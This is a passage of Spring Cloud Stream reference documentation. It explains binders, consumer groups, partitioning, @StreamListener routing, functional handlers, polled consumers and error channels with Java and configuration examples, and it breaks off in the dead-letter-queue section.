<<spring-cloud-stream-overview-application-model,Spring Cloud Stream's application model>>\n* <<spring-cloud-stream-overview-binder-abstraction>>\n* <<spring-cloud-stream-overview-persistent-publish-subscribe-support,Persistent publish-subscribe support>>\n* <<consumer-groups,Consumer group support>>\n* <<partitioning,Partitioning support>>\n* <<spring-cloud-stream-overview-binder-api,A pluggable Binder SPI>>\n\n[[spring-cloud-stream-overview-application-model]]\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output channels injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-with-binder.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in stand-alone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"`fat`\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle. 
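For example, with Maven, it is typically enough to declare the Spring Boot plugin (a minimal sketch, assuming the `spring-boot-starter-parent` manages the plugin version and configuration):\n\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\nRunning `mvn package` then produces an executable JAR that can be started with `java -jar`. 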
See the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/howto-build.html#howto-create-an-executable-jar-with-maven[Spring Boot Reference Guide] for more details.\n\n[[spring-cloud-stream-overview-binder-abstraction]]\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-kafka[Kafka] and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-rabbit[Rabbit MQ].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can also use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (such as the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<spring-cloud-stream-overview-introducing>> section, setting the `spring.cloud.stream.bindings.input.destination` application property to `raw-sensor-data` causes it to read from the `raw-sensor-data` Kafka topic or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can use different types of middleware with the same code.\nTo do so, include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder( and even whether to use different binders for different channels) at runtime.\n\n[[spring-cloud-stream-overview-persistent-publish-subscribe-support]]\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::SCSt-sensors.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS (Hadoop Distributed File System).\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer and lets new applications be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou can then add another application that interprets 
the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing so, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a consumer group.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.<channelName>.group` property to specify a group name.\nFor the consumers shown in the following figure, this property would be set as `spring.cloud.stream.bindings.<channelName>.group=hdfsWrite` or `spring.cloud.stream.bindings.<channelName>.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::SCSt-groups.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nAll groups that subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a publish-subscribe relationship with all other consumer groups.\n\n[[consumer-types]]\n=== Consumer Types\n\nTwo types of consumer are supported:\n\n* Message-driven (sometimes referred to as Asynchronous)\n* Polled (sometimes referred to as Synchronous)\n\nPrior to version 2.0, only asynchronous consumers were supported. A message is delivered as soon as it is available and a thread is available to process it.\n\nWhen you wish to control the rate at which messages are processed, you might want to use a synchronous consumer. A message is then delivered only when the application asks for it, so the application itself controls the rate of processing.\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are durable.\nThat is, a binder implementation ensures that group subscriptions are persistent and that, once at least one subscription for a group has been created, the group receives messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (such as RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nDoing so prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for partitioning data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (such as the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics is processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (for example, Kafka) or not (for example, RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::SCSt-partitioning.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nPartitioning is a critical concept in stateful processing, where ensuring that all related data is processed together is essential (for either performance or consistency reasons).\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\nNOTE: To set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends, as sketched below.
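The following is a minimal sketch of such a configuration (the `output` and `input` binding names, the `payload.id` key expression, and the instance counts are illustrative):\n\n[source,text]\n----\n# producer side: derive the partition key and declare the partition count\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n# consumer side: mark the input as partitioned and identify this instance\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceCount=5\nspring.cloud.stream.instanceIndex=0\n----\n\nWith these settings, messages whose `payload.id` evaluates to the same value are always routed to the same partition and, therefore, to the same consumer instance.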
== Programming Model\n\nTo understand the programming model, you should be familiar with the following core concepts:\n\n* *Destination Binders:* Components responsible for providing integration with the external messaging systems.\n* *Destination Bindings:* Bridge between the external messaging systems and the application-provided _Producers_ and _Consumers_ of messages (created by the Destination Binders).\n* *Message:* The canonical data structure used by producers and consumers to communicate with Destination Binders (and thus other applications via external messaging systems).\n\nimage::SCSt-overview.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n=== Destination Binders\n\nDestination Binders are extension components of Spring Cloud Stream responsible for providing the necessary configuration and implementation to facilitate\nintegration with external messaging systems.\nThis integration is responsible for connectivity, delegation, and routing of messages to and from producers and consumers, data type conversion,\ninvocation of the user code, and more.\n\nBinders handle a lot of the boilerplate responsibilities that would 
otherwise fall on your shoulders. However, to accomplish that, the binder still needs\nsome help in the form of minimalistic yet required set of instructions from the user, which typically come in the form of some type of configuration.\n\nWhile it is out of scope of this section to discuss all of the available binder and binding configuration options (the rest of the manual covers them extensively),\n_Destination Binding_ does require special attention. The next section discusses it in detail.\n\n=== Destination Bindings\n\nAs stated earlier, _Destination Bindings_ provide a bridge between the external messaging system and application-provided _Producers_ and _Consumers_.\n\nApplying the @EnableBinding annotation to one of the application\u2019s configuration classes defines a destination binding.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the configuration of the Spring Cloud Stream infrastructure.\n\nThe following example shows a fully configured and functioning Spring Cloud Stream application that receives the payload of the message from the `INPUT`\ndestination as a `String` type (see <<Content Type Negotiation>> section), logs it to the console and sends it to the `OUTPUT` destination after converting it to upper case.\n\n[source, java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyApplication.class, args);\n\t}\n\n\t@StreamListener(Processor.INPUT)\n\t@SendTo(Processor.OUTPUT)\n\tpublic String handle(String value) {\n\t\tSystem.out.println(\"Received: \" + value);\n\t\treturn value.toUpperCase();\n\t}\n}\n----\n\nAs you can see the `@EnableBinding` annotation can take one or more interface classes as parameters. The parameters are referred to as _bindings_,\nand they contain methods representing _bindable components_.\nThese components are typically message channels (see https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-messaging.html[Spring Messaging])\nfor channel-based binders (such as Rabbit, Kafka, and others). However other types of bindings can\nprovide support for the native features of the corresponding technology. 
For example Kafka Streams binder (formerly known as KStream) allows native bindings directly to Kafka Streams\n(see https:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud-stream-binder-kafka-docs\/1.1.0.M1\/reference\/htmlsingle\/[Kafka Streams] for more details).\n\nSpring Cloud Stream already provides _binding_ interfaces for typical message exchange contracts, which include:\n\n* *Sink:* Identifies the contract for the message consumer by providing the destination from which the message is consumed.\n* *Source:* Identifies the contract for the message producer by providing the destination to which the produced message is sent.\n* *Processor:* Encapsulates both the sink and the source contracts by exposing two destinations that allow consumption and production of messages.\n\n[source, java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\n[source, java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n}\n----\n\n[source, java]\n----\npublic interface Processor extends Source, Sink {}\n----\n\nWhile the preceding example satisfies the majority of cases, you can also define your own contracts by defining your own bindings interfaces and use `@Input` and `@Output`\nannotations to identify the actual _bindable components_.\n\nFor example:\n\n[source, java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing the interface shown in the preceding example as a parameter to `@EnableBinding` triggers the creation of the three bound channels named `orders`, `hotDrinks`, and `coldDrinks`,\nrespectively.\n\nYou can provide as many binding interfaces as you need, as arguments to the `@EnableBinding` annotation, as shown in the following example:\n\n[source, java]\n----\n@EnableBinding(value = { Orders.class, Payment.class })\n----\n\nIn Spring Cloud Stream, the bindable `MessageChannel` components are the Spring Messaging `MessageChannel` (for outbound) and its extension, `SubscribableChannel`,\n(for inbound).\n\n*Pollable Destination Binding*\n\nWhile the previously described bindings support event-based message consumption, sometimes you need more control, such as rate of consumption.\n\nStarting with version 2.0, you can now bind a pollable consumer:\n\nThe following example shows how to bind a pollable consumer:\n\n[source, java]\n----\npublic interface PolledBarista {\n\n @Input\n PollableMessageSource orders();\n\t. . .\n}\n----\n\nIn this case, an implementation of `PollableMessageSource` is bound to the `orders` \u201cchannel\u201d. See <<Using Polled Consumers>> for more details.\n\n*Customizing Channel Names*\n\nBy using the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source, java]\n----\npublic interface Barista {\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn the preceding example, the created bound channel is named `inboundOrders`.\n\nNormally, you need not access individual channels or bindings directly (other then configuring them via `@EnableBinding` annotation). 
However, there may be\ntimes, such as testing or other corner cases, when you do.\n\nAside from generating channels for each binding and registering them as Spring beans, for each bound interface, Spring Cloud Stream generates a bean that implements the interface.\nThat means you can have access to the interfaces representing the bindings or to individual channels by auto-wiring either in your application, as shown in the following two examples:\n\n_Autowire Binding interface_\n\n[source, java]\n----\n@Autowired\nprivate Source source;\n\npublic void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(name).build());\n}\n----\n\n_Autowire individual channel_\n\n[source, java]\n----\n@Autowired\nprivate MessageChannel output;\n\npublic void sayHello(String name) {\n output.send(MessageBuilder.withPayload(name).build());\n}\n----\n\nYou can also use Spring's standard `@Qualifier` annotation for cases when channel names are customized or in multiple-channel scenarios that require specifically named channels.\n\nThe following example shows how to use the @Qualifier annotation in this way:\n\n[source, java]\n----\n@Autowired\n@Qualifier(\"myChannel\")\nprivate MessageChannel output;\n----\n\n[[spring-cloud-stream-overview-producing-consuming-messages]]\n=== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application by using either Spring Integration annotations or Spring Cloud Stream native annotations.\n\n==== Spring Integration Support\n\nSpring Cloud Stream is built on the concepts and patterns defined by http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] and relies\nin its internal implementation on an already established and popular implementation of Enterprise Integration Patterns within the Spring portfolio of projects:\nthe https:\/\/projects.spring.io\/spring-integration\/[Spring Integration] framework.\n\nSo it's only natural for it to support the foundation, semantics, and configuration options that are already established by Spring Integration.\n\nFor example, you can attach the output channel of a `Source` to a `MessageSource` and use the familiar `@InboundChannelAdapter` annotation, as follows:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"10\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(\"Hello Spring Cloud Stream\");\n }\n}\n----\n\nSimilarly, you can use `@Transformer` or `@ServiceActivator` while providing an implementation of a message handler method for a _Processor_ binding contract, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpperCase();\n }\n}\n----\n\nNOTE: While this may be skipping ahead a bit, it is important to understand that, when you consume from the same binding using the `@StreamListener` annotation, a pub-sub model is used.\nEach method annotated with `@StreamListener` receives its own copy of a message, and each one has its own consumer group.\nHowever, if you consume from the same binding by using one of the Spring Integration annotations (such as `@Aggregator`, `@Transformer`, or `@ServiceActivator`), those consume in a competing model.\nNo individual consumer group is created for each subscription.
==== Using @StreamListener Annotation\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations\n(`@MessageMapping`, `@JmsListener`, `@RabbitListener`, and others), and provides conveniences, such as content-based routing.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers`, and `@Header`.\n\nFor methods that return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n\n==== Using @StreamListener for Content-based Routing\n\nSpring Cloud Stream supports dispatching messages to multiple handler methods annotated with `@StreamListener` based on conditions.\n\nIn order to be eligible to support conditional dispatching, a method must satisfy the following conditions:\n\n* It must not return a value.\n* It must be an individual message handling method (reactive API methods are not supported).\n\nThe condition is specified by a SpEL expression in the `condition` argument of the annotation and is evaluated for each message.\nAll the handlers that match the condition are invoked in the same thread, and no assumption must be made about the order in which the invocations take place.\n\nIn the following example of a `@StreamListener` with dispatching conditions, all the messages bearing a header `type` with the value `bogey` are dispatched to the\n`receiveBogey` method, and all the messages bearing a header `type` with the value `bacall` are dispatched to the `receiveBacall` method.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class TestPojoWithAnnotatedArguments {\n\n @StreamListener(target = Sink.INPUT, condition = \"headers['type']=='bogey'\")\n public void receiveBogey(@Payload BogeyPojo bogeyPojo) {\n \/\/ handle the message\n }\n\n @StreamListener(target = Sink.INPUT, condition = \"headers['type']=='bacall'\")\n public void receiveBacall(@Payload BacallPojo bacallPojo) {\n \/\/ handle the message\n }\n}\n----\n
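For these conditions to ever match, the producing side must set the `type` header explicitly. The following is a minimal sketch of such a producer (the autowired `source` binding and the `BogeyPojo` payload are assumed from the surrounding examples):\n\n[source,java]\n----\nMessage<BogeyPojo> message = MessageBuilder\n .withPayload(new BogeyPojo())\n .setHeader(\"type\", \"bogey\") \/\/ drives the condition evaluation\n .build();\nsource.output().send(message);\n----\n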
*Content Type Negotiation in the Context of `condition`*\n\nIt is important to understand some of the mechanics behind content-based routing using the `condition` argument of `@StreamListener`, especially in the context of the type of the message as a whole.\nIt may also help if you familiarize yourself with the <<Content Type Negotiation>> before you proceed.\n\nConsider the following scenario:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class CatsAndDogs {\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Dog'\")\n public void bark(Dog dog) {\n \/\/ handle the message\n }\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Cat'\")\n public void purr(Cat cat) {\n \/\/ handle the message\n }\n}\n----\n\nThe preceding code is perfectly valid. It compiles and deploys without any issues, yet it never produces the result you expect.\n\nThat is because you are testing something that does not yet exist in the state you expect: at the point when the condition is evaluated, the payload of the message has not yet been converted from the\nwire format (`byte[]`) to the desired type.\nIn other words, it has not yet gone through the type conversion process described in <<Content Type Negotiation>>.\n\nSo, unless you use a SpEL expression that evaluates raw data (for example, the value of the first byte in the byte array), use message header-based expressions\n(such as `condition = \"headers['type']=='dog'\"`).\n\nNOTE: At the moment, dispatching through `@StreamListener` conditions is supported only for channel-based binders (not for reactive programming support).\n\n[[_spring_cloud_function]]\n==== Spring Cloud Function support\n\nSince Spring Cloud Stream v2.1, another alternative for defining _stream handlers_ and _sources_ is to use built-in\nsupport for https:\/\/cloud.spring.io\/spring-cloud-function\/[Spring Cloud Function], where they can be expressed as beans of\ntype `java.util.function.[Supplier\/Function\/Consumer]`.\n\nTo specify which functional bean to bind to the external destination(s) exposed by the bindings, you must provide the `spring.cloud.stream.function.definition` property.\n\nHere is an example of a Processor application exposing a message handler as a `java.util.function.Function`:\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyFunctionBootApp {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyFunctionBootApp.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\nIn the preceding example, we define a bean of type `java.util.function.Function` called _toUpperCase_ and identify it as the bean to be used as the message handler,\nwhose 'input' and 'output' must be bound to the external destinations exposed by the Processor binding.\n\nBelow are examples of simple functional applications supporting Source, Processor, and Sink.\n\nHere is an example of a Source application defined as a `java.util.function.Supplier`:\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic static class SourceFromSupplier {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SourceFromSupplier.class, \"--spring.cloud.stream.function.definition=date\");\n\t}\n\t@Bean\n\tpublic Supplier<Date> date() {\n\t\treturn () -> new Date(12345L);\n\t}\n}\n----\n\nHere is an example of a Processor application defined as a `java.util.function.Function`:\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic static class ProcessorFromFunction {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(ProcessorFromFunction.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\n\nHere is an example of a Sink application defined as a `java.util.function.Consumer`:\n[source,java]\n----\n@EnableAutoConfiguration\n@EnableBinding(Sink.class)\npublic static class SinkFromConsumer {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SinkFromConsumer.class, \"--spring.cloud.stream.function.definition=sink\");\n\t}\n\t@Bean\n\tpublic Consumer<String> sink() {\n\t\treturn System.out::println;\n\t}\n}\n----
{\n\t\treturn System.out::println;\n\t}\n}\n----\n\n===== Functional Composition\n\nUsing this programming model you can also benefit from functional composition where you can dynamically compose complex handlers from a set of simple functions.\nAs an example let's add the following function bean to the application defined above\n[source,java]\n----\n@Bean\npublic Function<String, String> wrapInQuotes() {\n\treturn s -> \"\\\"\" + s + \"\\\"\";\n}\n----\nand modify the `spring.cloud.stream.function.definition` property to reflect your intention to compose a new function from both \u2018toUpperCase\u2019 and \u2018wrapInQuotes\u2019.\nTo do that Spring Cloud Function allows you to use `|` (pipe) symbol. So to finish our example our property will now look like this:\n\n[source,java]\n----\n\u2014spring.cloud.stream.function.definition=toUpperCase|wrapInQuotes\n----\n\n\n\n[[spring-cloud-streams-overview-using-polled-consumers]]\n==== Using Polled Consumers\n\n===== Overview\n\nWhen using polled consumers, you poll the `PollableMessageSource` on demand.\nConsider the following example of a polled consumer:\n\n[source,java]\n----\npublic interface PolledConsumer {\n\n @Input\n PollableMessageSource destIn();\n\n @Output\n MessageChannel destOut();\n\n}\n----\n\nGiven the polled consumer in the preceding example, you might use it as follows:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource destIn, MessageChannel destOut) {\n return args -> {\n while (someCondition()) {\n try {\n if (!destIn.poll(m -> {\n String newPayload = ((String) m.getPayload()).toUpperCase();\n destOut.send(new GenericMessage<>(newPayload));\n })) {\n Thread.sleep(1000);\n }\n }\n catch (Exception e) {\n \/\/ handle failure\n }\n }\n };\n}\n----\n\nThe `PollableMessageSource.poll()` method takes a `MessageHandler` argument (often a lambda expression, as shown here).\nIt returns `true` if the message was received and successfully processed.\n\nAs with message-driven consumers, if the `MessageHandler` throws an exception, messages are published to error channels, as discussed in \"`<<binder-error-channels>>`\".\n\nNormally, the `poll()` method acknowledges the message when the `MessageHandler` exits.\nIf the method exits abnormally, the message is rejected (not re-queued), but see <<polled-errors>>.\nYou can override that behavior by taking responsibility for the acknowledgment, as shown in the following example:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource dest1In, MessageChannel dest2Out) {\n return args -> {\n while (someCondition()) {\n if (!dest1In.poll(m -> {\n StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).noAutoAck();\n \/\/ e.g. hand off to another thread which can perform the ack\n \/\/ or acknowledge(Status.REQUEUE)\n\n })) {\n Thread.sleep(1000);\n }\n }\n };\n}\n----\n\nIMPORTANT: You must `ack` (or `nack`) the message at some point, to avoid resource leaks.\n\nIMPORTANT: Some messaging systems (such as Apache Kafka) maintain a simple offset in a log. 
If a delivery fails and is re-queued with `StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).acknowledge(Status.REQUEUE);`, any later successfully ack'd messages are redelivered.\n\nThere is also an overloaded `poll` method, for which the definition is as follows:\n\n[source,java]\n----\npoll(MessageHandler handler, ParameterizedTypeReference<?> type)\n----\n\nThe `type` is a conversion hint that allows the incoming message payload to be converted, as shown in the following example:\n\n[source,java]\n----\nboolean result = pollableSource.poll(received -> {\n\t\t\tMap<String, Foo> payload = (Map<String, Foo>) received.getPayload();\n ...\n\n\t\t}, new ParameterizedTypeReference<Map<String, Foo>>() {});\n----\n\n[[polled-errors]]\n===== Handling Errors\n\nBy default, an error channel is configured for the pollable source; if the callback throws an exception, an `ErrorMessage` is sent to the error channel (`<destination>.<group>.errors`); this error channel is also bridged to the global Spring Integration `errorChannel`.\n\nYou can subscribe to either error channel with a `@ServiceActivator` to handle errors; without a subscription, the error will simply be logged and the message will be acknowledged as successful.\nIf the error channel service activator throws an exception, the message will be rejected (by default) and won't be redelivered.\nIf the service activator throws a `RequeueCurrentMessageException`, the message will be requeued at the broker and will be again retrieved on a subsequent poll.\n\nIf the listener throws a `RequeueCurrentMessageException` directly, the message will be requeued, as discussed above, and will not be sent to the error channels.\n\n[[spring-cloud-stream-overview-error-handling]]\n=== Error Handling\n\nErrors happen, and Spring Cloud Stream provides several flexible mechanisms to handle them.\nThe error handling comes in two flavors:\n\n * *application:* The error handling is done within the application (custom error handler).\n\n * *system:* The error handling is delegated to the binder (re-queue, DL, and others). Note that the techniques are dependent on binder implementation and the\n capability of the underlying messaging middleware.\n\nSpring Cloud Stream uses the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library to facilitate successful message processing. See <<Retry Template>> for more details.\nHowever, when all fails, the exceptions thrown by the message handlers are propagated back to the binder. At that point, binder invokes custom error handler or communicates\nthe error back to the messaging system (re-queue, DLQ, and others).\n\n==== Application Error Handling\n\nThere are two types of application-level error handling. Errors can be handled at each binding subscription or a global handler can handle all the binding subscription errors. 
Let's review the details.\n\n.A Spring Cloud Stream Sink Application with Custom and Global Error Handlers\nimage::custom_vs_global_error_channels.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nFor each input binding, Spring Cloud Stream creates a dedicated error channel whose name follows the convention `<destinationName>.errors`.\n\nNOTE: The `<destinationName>` consists of the name of the binding (such as `input`) and the name of the group (such as `myGroup`).\n\nConsider the following:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\n[source,java]\n----\n@StreamListener(Sink.INPUT) \/\/ destination name 'input.myGroup'\npublic void handle(Person value) {\n\tthrow new RuntimeException(\"BOOM!\");\n}\n\n@ServiceActivator(inputChannel = Processor.INPUT + \".myGroup.errors\") \/\/channel name 'input.myGroup.errors'\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nIn the preceding example, the destination name is `input.myGroup` and the dedicated error channel name is `input.myGroup.errors`.\n\nNOTE: The @StreamListener annotation is intended specifically to define bindings that bridge internal channels and external destinations. Given that the destination-specific\nerror channel does NOT have an associated external destination, such a channel is a prerogative of Spring Integration (SI). This means that the handler\nfor such a destination must be defined using one of the SI handler annotations (such as @ServiceActivator or @Transformer).\n\nNOTE: If `group` is not specified, an anonymous group is used (something like `input.anonymous.2K37rb06Q6m2r51-SPIDDQ`), which is not suitable for error\nhandling scenarios, since you don't know what it is going to be until the destination is created.\n\nAlso, in the event you are binding to an existing destination, such as:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.destination=myFooDestination\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\nthe full destination name is `myFooDestination.myGroup`, and the dedicated error channel name is `myFooDestination.myGroup.errors`.\n\nBack to the example...\n\nThe `handle(..)` method, which subscribes to the channel named `input`, throws an exception. Given that there is also a subscriber to the error channel `input.myGroup.errors`,\nall error messages are handled by that subscriber.\n\nIf you have multiple bindings, you may want to have a single error handler. Spring Cloud Stream automatically provides support for\na _global error channel_ by bridging each individual error channel to the channel named `errorChannel`, allowing a single subscriber to handle all errors,\nas shown in the following example:\n\n[source,java]\n----\n@StreamListener(\"errorChannel\")\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nThis may be a convenient option if error handling logic is the same regardless of which handler produced the error.\n\n==== System Error Handling\n\nSystem-level error handling implies that the errors are communicated back to the messaging system and, given that not every messaging system\nis the same, the capabilities may differ from binder to binder.\n\nThat said, in this section we explain the general idea behind system-level error handling and use the Rabbit binder as an example.\n\nNOTE: The Kafka binder provides similar\nsupport, although some configuration properties do differ. 
Also, for more details and configuration options, see the individual binder's documentation.\n\nIf no internal error handlers are configured, the errors propagate to the binders, and the binders subsequently propagate those errors back to the messaging system.\nDepending on the capabilities of the messaging system such a system may _drop_ the message, _re-queue_ the message for re-processing or _send the failed message to DLQ_.\nBoth Rabbit and Kafka support these concepts. However, other binders may not, so refer to your individual binder\u2019s documentation for details on supported system-level\nerror-handling options.\n\n===== Drop Failed Messages\n\nBy default, if no additional system-level configuration is provided, the messaging system drops the failed message.\nWhile acceptable in some cases, for most cases, it is not, and we need some recovery mechanism to avoid message loss.\n\n===== DLQ - Dead Letter Queue\n\nDLQ allows failed messages to be sent to a special destination: - _Dead Letter Queue_.\n\nWhen configured, failed messages are sent to this destination for subsequent re-processing or auditing and reconciliation.\n\nFor example, continuing on the previous example and to set up the DLQ with Rabbit binder, you need to set the following property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.auto-bind-dlq=true\n----\n\nKeep in mind that, in the above property, `input` corresponds to the name of the input destination binding.\nThe `consumer` indicates that it is a consumer property and `auto-bind-dlq` instructs the binder to configure DLQ for `input`\ndestination, which results in an additional Rabbit queue named 